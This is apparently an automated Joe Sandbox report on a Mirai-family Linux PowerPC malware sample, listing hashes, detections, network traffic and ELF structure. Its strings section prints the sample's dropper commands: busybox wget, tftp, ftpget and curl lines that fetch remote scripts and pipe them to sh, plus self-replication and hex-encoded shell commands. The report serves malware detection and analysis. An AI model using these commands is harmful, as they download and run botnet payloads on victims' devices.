Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
tppc.elf

Overview

General Information

Sample name:tppc.elf
Analysis ID:1496629
MD5:32432f6bbc11635dcaea61059cdfa891
SHA1:6e4b619d171fa3d6026c3af8adb6068231c16a28
SHA256:b7cf3c3c1df98184eec498824cb7ca77225735caba60626053784e64791faea6
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Sample deletes itself
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1496629
Start date and time:2024-08-21 15:32:25 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:tppc.elf
Detection:MAL
Classification:mal52.evad.linELF@0/0@0/0
  • VT rate limit hit for: tppc.elf
Command:/tmp/tppc.elf
PID:6262
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • tppc.elf (PID: 6262, Parent: 6188, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/tppc.elf
  • dash New Fork (PID: 6277, Parent: 4331)
  • rm (PID: 6277, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.LaopNjNyHy /tmp/tmp.N6R7vqmHID /tmp/tmp.7Vzzxe6xFH
  • dash New Fork (PID: 6278, Parent: 4331)
  • rm (PID: 6278, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.LaopNjNyHy /tmp/tmp.N6R7vqmHID /tmp/tmp.7Vzzxe6xFH
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: tppc.elfReversingLabs: Detection: 28%
Source: tppc.elfString: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox echo "whomp whomp fn" > /proc/sys/kernel/hostname/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: global trafficTCP traffic: 192.168.2.23:43700 -> 197.121.73.100:37215
Source: global trafficTCP traffic: 192.168.2.23:40034 -> 197.178.134.92:37215
Source: global trafficTCP traffic: 192.168.2.23:58316 -> 156.166.220.68:37215
Source: global trafficTCP traffic: 192.168.2.23:36494 -> 156.108.45.12:37215
Source: global trafficTCP traffic: 192.168.2.23:54234 -> 156.30.232.144:37215
Source: global trafficTCP traffic: 192.168.2.23:53610 -> 197.45.57.147:37215
Source: global trafficTCP traffic: 192.168.2.23:52356 -> 41.127.106.52:37215
Source: global trafficTCP traffic: 192.168.2.23:57716 -> 156.120.112.68:37215
Source: global trafficTCP traffic: 192.168.2.23:36264 -> 41.88.166.148:37215
Source: global trafficTCP traffic: 192.168.2.23:47950 -> 156.146.83.211:37215
Source: global trafficTCP traffic: 192.168.2.23:52928 -> 197.21.238.134:37215
Source: global trafficTCP traffic: 192.168.2.23:44238 -> 41.88.168.155:37215
Source: global trafficTCP traffic: 192.168.2.23:36948 -> 197.187.177.134:37215
Source: global trafficTCP traffic: 192.168.2.23:44586 -> 156.239.31.199:37215
Source: global trafficTCP traffic: 192.168.2.23:50862 -> 41.8.61.134:37215
Source: global trafficTCP traffic: 192.168.2.23:59666 -> 197.76.27.167:37215
Source: global trafficTCP traffic: 192.168.2.23:45672 -> 141.98.10.95:6523
Source: /tmp/tppc.elf (PID: 6262)Socket: 127.0.0.1:1122Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 197.121.73.100
Source: unknownTCP traffic detected without corresponding DNS query: 197.178.134.92
Source: unknownTCP traffic detected without corresponding DNS query: 156.166.220.68
Source: unknownTCP traffic detected without corresponding DNS query: 156.108.45.12
Source: unknownTCP traffic detected without corresponding DNS query: 156.30.232.144
Source: unknownTCP traffic detected without corresponding DNS query: 197.45.57.147
Source: unknownTCP traffic detected without corresponding DNS query: 41.127.106.52
Source: unknownTCP traffic detected without corresponding DNS query: 156.120.112.68
Source: unknownTCP traffic detected without corresponding DNS query: 41.88.166.148
Source: unknownTCP traffic detected without corresponding DNS query: 156.146.83.211
Source: unknownTCP traffic detected without corresponding DNS query: 197.21.238.134
Source: unknownTCP traffic detected without corresponding DNS query: 41.88.168.155
Source: unknownTCP traffic detected without corresponding DNS query: 197.187.177.134
Source: unknownTCP traffic detected without corresponding DNS query: 156.239.31.199
Source: unknownTCP traffic detected without corresponding DNS query: 41.8.61.134
Source: unknownTCP traffic detected without corresponding DNS query: 197.76.27.167
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: tppc.elfString found in binary or memory: http:///curl.sh
Source: tppc.elfString found in binary or memory: http:///wget.sh
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39258
Source: unknownNetwork traffic detected: HTTP traffic on port 39258 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: usage: busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo "whomp whomp fn" > /proc/sys/kernel/hostname
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox echo "whomp whomp fn" > /proc/sys/kernel/hostname/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sampleString containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepi love the big /var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x2
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal52.evad.linELF@0/0@0/0
Source: /usr/bin/dash (PID: 6277)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.LaopNjNyHy /tmp/tmp.N6R7vqmHID /tmp/tmp.7Vzzxe6xFHJump to behavior
Source: /usr/bin/dash (PID: 6278)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.LaopNjNyHy /tmp/tmp.N6R7vqmHID /tmp/tmp.7Vzzxe6xFHJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/tppc.elf (PID: 6262)File: /tmp/tppc.elfJump to behavior
Source: /tmp/tppc.elf (PID: 6262)Queries kernel information via 'uname': Jump to behavior
Source: tppc.elf, 6262.1.00005603ad85f000.00005603ad932000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc1
Source: tppc.elf, 6262.1.00005603ad85f000.00005603ad932000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc
Source: tppc.elf, 6262.1.00007ffd02d81000.00007ffd02da2000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
Source: tppc.elf, 6262.1.00007ffd02d81000.00007ffd02da2000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-ppc/tmp/tppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/tppc.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path Interception11
File Deletion
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1496629 Sample: tppc.elf Startdate: 21/08/2024 Architecture: LINUX Score: 52 13 197.187.177.134, 36948, 37215 airtel-tz-asTZ Tanzania United Republic of 2->13 15 156.120.112.68, 37215, 57716 XNSTGCA United States 2->15 17 19 other IPs or domains 2->17 19 Multi AV Scanner detection for submitted file 2->19 6 tppc.elf 2->6         started        9 dash rm 2->9         started        11 dash rm 2->11         started        signatures3 process4 signatures5 21 Sample deletes itself 6->21
SourceDetectionScannerLabelLink
tppc.elf29%ReversingLabsLinux.Trojan.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http:///wget.shtppc.elffalse
    unknown
    http:///curl.shtppc.elffalse
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      41.127.106.52
      unknownSouth Africa
      16637MTNNS-ASZAfalse
      41.88.166.148
      unknownEgypt
      33771SAFARICOM-LIMITEDKEfalse
      156.239.31.199
      unknownSeychelles
      8100ASN-QUADRANET-GLOBALUSfalse
      197.187.177.134
      unknownTanzania United Republic of
      37133airtel-tz-asTZfalse
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      141.98.10.95
      unknownLithuania
      209605HOSTBALTICLTfalse
      41.88.168.155
      unknownEgypt
      33771SAFARICOM-LIMITEDKEfalse
      197.76.27.167
      unknownSouth Africa
      16637MTNNS-ASZAfalse
      197.45.57.147
      unknownEgypt
      8452TE-ASTE-ASEGfalse
      156.166.220.68
      unknownEgypt
      36992ETISALAT-MISREGfalse
      156.108.45.12
      unknownUnited States
      36081STATE-OF-COLORADO-MNT-NETWORKUSfalse
      34.249.145.219
      unknownUnited States
      16509AMAZON-02USfalse
      156.120.112.68
      unknownUnited States
      393504XNSTGCAfalse
      197.21.238.134
      unknownTunisia
      37693TUNISIANATNfalse
      156.30.232.144
      unknownUnited States
      34542SAFRANHE-ASFRfalse
      197.121.73.100
      unknownEgypt
      36992ETISALAT-MISREGfalse
      197.178.134.92
      unknownKenya
      33771SAFARICOM-LIMITEDKEfalse
      41.8.61.134
      unknownSouth Africa
      29975VODACOM-ZAfalse
      156.146.83.211
      unknownUnited States
      3743ARCEL-2USfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      34.249.145.219MDFZw2U0Ighb3bI9K2SX7ce4TvmxPbklXP.elfGet hashmaliciousUnknownBrowse
        earm6.elfGet hashmaliciousUnknownBrowse
          hoho.arc.elfGet hashmaliciousUnknownBrowse
            arm4.elfGet hashmaliciousUnknownBrowse
              darkness.elfGet hashmaliciousGafgyt, MiraiBrowse
                ZXIYF2Kbjo.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                  bot.arm6.elfGet hashmaliciousMirai, OkiruBrowse
                    sEhhAVrWAB.elfGet hashmaliciousUnknownBrowse
                      oHkZAUjDva.elfGet hashmaliciousUnknownBrowse
                        LCkGOSw1kR.elfGet hashmaliciousUnknownBrowse
                          109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                          • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                          141.98.10.95sarm6.elfGet hashmaliciousMiraiBrowse
                            1316wjL1Ep.elfGet hashmaliciousUnknownBrowse
                              91.189.91.43sarm5.elfGet hashmaliciousMiraiBrowse
                                nsharm6.elfGet hashmaliciousMiraiBrowse
                                  sshc.elfGet hashmaliciousUnknownBrowse
                                    jew.arm5.elfGet hashmaliciousMiraiBrowse
                                      grjD7lWffX.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        arm.elfGet hashmaliciousUnknownBrowse
                                          bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                            bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                              bot.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                KKveTTgaAAsecNNaaaa.arm5.elfGet hashmaliciousUnknownBrowse
                                                  No context
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ASN-QUADRANET-GLOBALUSExeFile (278).exeGet hashmaliciousEmotetBrowse
                                                  • 203.25.159.3
                                                  GtZtVa7XV8.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                  • 64.188.9.172
                                                  EUR Swift Bildirimi12-08-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.247.165.99
                                                  T6LMJUoWLy.exeGet hashmaliciousRedLineBrowse
                                                  • 162.218.211.195
                                                  DHL AWB No 8023000.cmd.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                  • 162.218.211.195
                                                  INQUIRY#84790-AUGUST24.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                  • 64.188.18.85
                                                  https://t.ly/Jo2X0Get hashmaliciousHTMLPhisherBrowse
                                                  • 23.152.0.52
                                                  http://www.bilgebag.com/targo/Get hashmaliciousUnknownBrowse
                                                  • 104.247.173.252
                                                  SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.8296.30254.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                  • 67.215.224.135
                                                  SecuriteInfo.com.W32.Autoit.G.gen.Eldorado.30770.24366.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                  • 67.215.224.135
                                                  airtel-tz-asTZKKveTTgaAAsecNNaaaa.sh4.elfGet hashmaliciousUnknownBrowse
                                                  • 156.156.63.253
                                                  nullnet_load.x86.elfGet hashmaliciousMiraiBrowse
                                                  • 156.158.49.76
                                                  154.216.17.9-skid.ppc-2024-08-04T06_22_51.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 197.187.221.109
                                                  154.216.17.9-skid.arm5-2024-08-04T06_23_00.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 156.158.51.122
                                                  154.216.17.9-skid.arm-2024-08-04T06_22_56.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 197.187.29.166
                                                  154.216.17.9-skid.arm7-2024-08-04T06_23_04.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 197.152.130.237
                                                  154.216.17.9-skid.m68k-2024-08-04T06_23_08.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 156.158.49.47
                                                  154.216.17.9-skid.mips-2024-08-04T06_23_09.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 156.158.50.40
                                                  154.216.17.9-skid.x86_64-2024-08-04T06_23_14.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 156.157.24.209
                                                  154.216.17.9-skid.mpsl-2024-08-04T06_22_50.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 156.158.98.161
                                                  MTNNS-ASZAKKveTTgaAAsecNNaaaa.ppc.elfGet hashmaliciousUnknownBrowse
                                                  • 197.72.65.165
                                                  KKveTTgaAAsecNNaaaa.mpsl.elfGet hashmaliciousUnknownBrowse
                                                  • 105.211.189.220
                                                  ExeFile (388).exeGet hashmaliciousEmotetBrowse
                                                  • 105.209.235.113
                                                  ExeFile (39).exeGet hashmaliciousEmotetBrowse
                                                  • 105.209.235.113
                                                  ExeFile (220).exeGet hashmaliciousEmotetBrowse
                                                  • 105.209.235.113
                                                  ExeFile (186).exeGet hashmaliciousEmotetBrowse
                                                  • 105.213.67.88
                                                  ExeFile (201).exeGet hashmaliciousEmotetBrowse
                                                  • 105.209.239.55
                                                  ExeFile (107).exeGet hashmaliciousEmotetBrowse
                                                  • 105.209.235.113
                                                  ExeFile (122).exeGet hashmaliciousEmotetBrowse
                                                  • 105.209.235.113
                                                  SecuriteInfo.com.Linux.Siggen.9999.2027.4559.elfGet hashmaliciousMiraiBrowse
                                                  • 105.209.4.65
                                                  SAFARICOM-LIMITEDKExd.x86.elfGet hashmaliciousMiraiBrowse
                                                  • 105.167.98.124
                                                  KKveTTgaAAsecNNaaaa.i686.elfGet hashmaliciousUnknownBrowse
                                                  • 197.177.27.39
                                                  KKveTTgaAAsecNNaaaa.x86_64.elfGet hashmaliciousUnknownBrowse
                                                  • 196.101.4.237
                                                  nullnet_load.arm.elfGet hashmaliciousMiraiBrowse
                                                  • 197.181.96.223
                                                  nullnet_load.arm7.elfGet hashmaliciousMiraiBrowse
                                                  • 196.100.168.178
                                                  nullnet_load.x86.elfGet hashmaliciousMiraiBrowse
                                                  • 197.177.39.207
                                                  b3astmode.x86.elfGet hashmaliciousMiraiBrowse
                                                  • 196.98.136.199
                                                  SecuriteInfo.com.Linux.Siggen.9999.22286.12230.elfGet hashmaliciousMiraiBrowse
                                                  • 196.108.221.95
                                                  botx.arm.elfGet hashmaliciousMiraiBrowse
                                                  • 196.106.207.45
                                                  botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                  • 197.179.242.16
                                                  No context
                                                  No context
                                                  No created / dropped files found
                                                  File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
                                                  Entropy (8bit):6.298004908059316
                                                  TrID:
                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                  File name:tppc.elf
                                                  File size:63'164 bytes
                                                  MD5:32432f6bbc11635dcaea61059cdfa891
                                                  SHA1:6e4b619d171fa3d6026c3af8adb6068231c16a28
                                                  SHA256:b7cf3c3c1df98184eec498824cb7ca77225735caba60626053784e64791faea6
                                                  SHA512:9474641e4d0286d8612000b92f25d6b19d34145e445dc0e144f3e9c9a81bf5288515a6c2dced44f397173953848ce37862804ea97b634198305cbeb57e53329b
                                                  SSDEEP:1536:zXFWuAxQsQQeJiXSaXEL3xaTgZux0IuQouMns8MsTy6:zXwudLQUk0zxrux0IuaMns76
                                                  TLSH:2B533B82330C4A57C16B1B71193F5BE1A3BB9E9022E0B2877A0EF74DC5B2E365585E5C
                                                  File Content Preview:.ELF...........................4.........4. ...(..........................................................TH........dt.Q.............................!..|......$H...H......$8!. |...N.. .!..|.......?.............../...@..\?........+../...A..$8...})......N..

                                                  ELF header

                                                  Class:ELF32
                                                  Data:2's complement, big endian
                                                  Version:1 (current)
                                                  Machine:PowerPC
                                                  Version Number:0x1
                                                  Type:EXEC (Executable file)
                                                  OS/ABI:UNIX - System V
                                                  ABI Version:0
                                                  Entry Point Address:0x100001f0
                                                  Flags:0x0
                                                  ELF Header Size:52
                                                  Program Header Offset:52
                                                  Program Header Size:32
                                                  Number of Program Headers:3
                                                  Section Header Offset:62684
                                                  Section Header Size:40
                                                  Number of Section Headers:12
                                                  Header String Table Index:11
                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                  NULL0x00x00x00x00x0000
                                                  .initPROGBITS0x100000940x940x240x00x6AX004
                                                  .textPROGBITS0x100000b80xb80xda480x00x6AX004
                                                  .finiPROGBITS0x1000db000xdb000x200x00x6AX004
                                                  .rodataPROGBITS0x1000db200xdb200x15ac0x00x2A004
                                                  .ctorsPROGBITS0x1001f0d00xf0d00x80x00x3WA004
                                                  .dtorsPROGBITS0x1001f0d80xf0d80x80x00x3WA004
                                                  .dataPROGBITS0x1001f0e80xf0e80x3740x00x3WA008
                                                  .sdataPROGBITS0x1001f45c0xf45c0x340x00x3WA004
                                                  .sbssNOBITS0x1001f4900xf4900x6c0x00x3WA004
                                                  .bssNOBITS0x1001f4fc0xf4900x501c0x00x3WA004
                                                  .shstrtabSTRTAB0x00xf4900x4b0x00x0001
                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                  LOAD0x00x100000000x100000000xf0cc0xf0cc6.34640x5R E0x10000.init .text .fini .rodata
                                                  LOAD0xf0d00x1001f0d00x1001f0d00x3c00x54483.11340x6RW 0x10000.ctors .dtors .data .sdata .sbss .bss
                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Aug 21, 2024 15:33:32.695147991 CEST3721558316156.166.220.68192.168.2.23
                                                  Aug 21, 2024 15:33:32.695205927 CEST3721540034197.178.134.92192.168.2.23
                                                  Aug 21, 2024 15:33:32.695233107 CEST3721543700197.121.73.100192.168.2.23
                                                  Aug 21, 2024 15:33:32.695311069 CEST4370037215192.168.2.23197.121.73.100
                                                  Aug 21, 2024 15:33:32.695311069 CEST4003437215192.168.2.23197.178.134.92
                                                  Aug 21, 2024 15:33:32.695311069 CEST5831637215192.168.2.23156.166.220.68
                                                  Aug 21, 2024 15:33:32.695461035 CEST3721536494156.108.45.12192.168.2.23
                                                  Aug 21, 2024 15:33:32.695480108 CEST3721554234156.30.232.144192.168.2.23
                                                  Aug 21, 2024 15:33:32.695513010 CEST3721553610197.45.57.147192.168.2.23
                                                  Aug 21, 2024 15:33:32.695514917 CEST3649437215192.168.2.23156.108.45.12
                                                  Aug 21, 2024 15:33:32.695516109 CEST5423437215192.168.2.23156.30.232.144
                                                  Aug 21, 2024 15:33:32.695530891 CEST3721557716156.120.112.68192.168.2.23
                                                  Aug 21, 2024 15:33:32.695544958 CEST372155235641.127.106.52192.168.2.23
                                                  Aug 21, 2024 15:33:32.695559978 CEST5361037215192.168.2.23197.45.57.147
                                                  Aug 21, 2024 15:33:32.695569038 CEST372153626441.88.166.148192.168.2.23
                                                  Aug 21, 2024 15:33:32.695590019 CEST5235637215192.168.2.2341.127.106.52
                                                  Aug 21, 2024 15:33:32.695590973 CEST5771637215192.168.2.23156.120.112.68
                                                  Aug 21, 2024 15:33:32.695593119 CEST3721547950156.146.83.211192.168.2.23
                                                  Aug 21, 2024 15:33:32.695607901 CEST3626437215192.168.2.2341.88.166.148
                                                  Aug 21, 2024 15:33:32.695657969 CEST4795037215192.168.2.23156.146.83.211
                                                  Aug 21, 2024 15:33:32.699146986 CEST3721552928197.21.238.134192.168.2.23
                                                  Aug 21, 2024 15:33:32.699207067 CEST5292837215192.168.2.23197.21.238.134
                                                  Aug 21, 2024 15:33:34.746987104 CEST372154423841.88.168.155192.168.2.23
                                                  Aug 21, 2024 15:33:34.747016907 CEST372155086241.8.61.134192.168.2.23
                                                  Aug 21, 2024 15:33:34.747045040 CEST3721536948197.187.177.134192.168.2.23
                                                  Aug 21, 2024 15:33:34.747064114 CEST3721544586156.239.31.199192.168.2.23
                                                  Aug 21, 2024 15:33:34.747087955 CEST3721559666197.76.27.167192.168.2.23
                                                  Aug 21, 2024 15:33:34.747108936 CEST4423837215192.168.2.2341.88.168.155
                                                  Aug 21, 2024 15:33:34.747108936 CEST3694837215192.168.2.23197.187.177.134
                                                  Aug 21, 2024 15:33:34.747108936 CEST4458637215192.168.2.23156.239.31.199
                                                  Aug 21, 2024 15:33:34.747108936 CEST5086237215192.168.2.2341.8.61.134
                                                  Aug 21, 2024 15:33:34.747129917 CEST5966637215192.168.2.23197.76.27.167
                                                  Aug 21, 2024 15:33:36.296492100 CEST43928443192.168.2.2391.189.91.42
                                                  Aug 21, 2024 15:33:41.671721935 CEST42836443192.168.2.2391.189.91.43
                                                  Aug 21, 2024 15:33:53.763633966 CEST4433925834.249.145.219192.168.2.23
                                                  Aug 21, 2024 15:33:53.764003992 CEST39258443192.168.2.2334.249.145.219
                                                  Aug 21, 2024 15:33:53.770483971 CEST4433925834.249.145.219192.168.2.23
                                                  Aug 21, 2024 15:33:57.797430038 CEST4251680192.168.2.23109.202.202.202
                                                  Aug 21, 2024 15:33:57.797437906 CEST43928443192.168.2.2391.189.91.42
                                                  Aug 21, 2024 15:34:08.035980940 CEST42836443192.168.2.2391.189.91.43
                                                  Aug 21, 2024 15:34:09.371817112 CEST652345672141.98.10.95192.168.2.23
                                                  Aug 21, 2024 15:34:09.371948004 CEST456726523192.168.2.23141.98.10.95
                                                  Aug 21, 2024 15:34:12.708146095 CEST1780334204141.98.10.95192.168.2.23
                                                  Aug 21, 2024 15:34:12.708477974 CEST3420417803192.168.2.23141.98.10.95
                                                  Aug 21, 2024 15:34:38.751848936 CEST43928443192.168.2.2391.189.91.42

                                                  System Behavior

                                                  Start time (UTC):13:33:33
                                                  Start date (UTC):21/08/2024
                                                  Path:/tmp/tppc.elf
                                                  Arguments:/tmp/tppc.elf
                                                  File size:5388968 bytes
                                                  MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                  Start time (UTC):13:33:52
                                                  Start date (UTC):21/08/2024
                                                  Path:/usr/bin/dash
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):13:33:52
                                                  Start date (UTC):21/08/2024
                                                  Path:/usr/bin/rm
                                                  Arguments:rm -f /tmp/tmp.LaopNjNyHy /tmp/tmp.N6R7vqmHID /tmp/tmp.7Vzzxe6xFH
                                                  File size:72056 bytes
                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                  Start time (UTC):13:33:52
                                                  Start date (UTC):21/08/2024
                                                  Path:/usr/bin/dash
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):13:33:52
                                                  Start date (UTC):21/08/2024
                                                  Path:/usr/bin/rm
                                                  Arguments:rm -f /tmp/tmp.LaopNjNyHy /tmp/tmp.N6R7vqmHID /tmp/tmp.7Vzzxe6xFH
                                                  File size:72056 bytes
                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b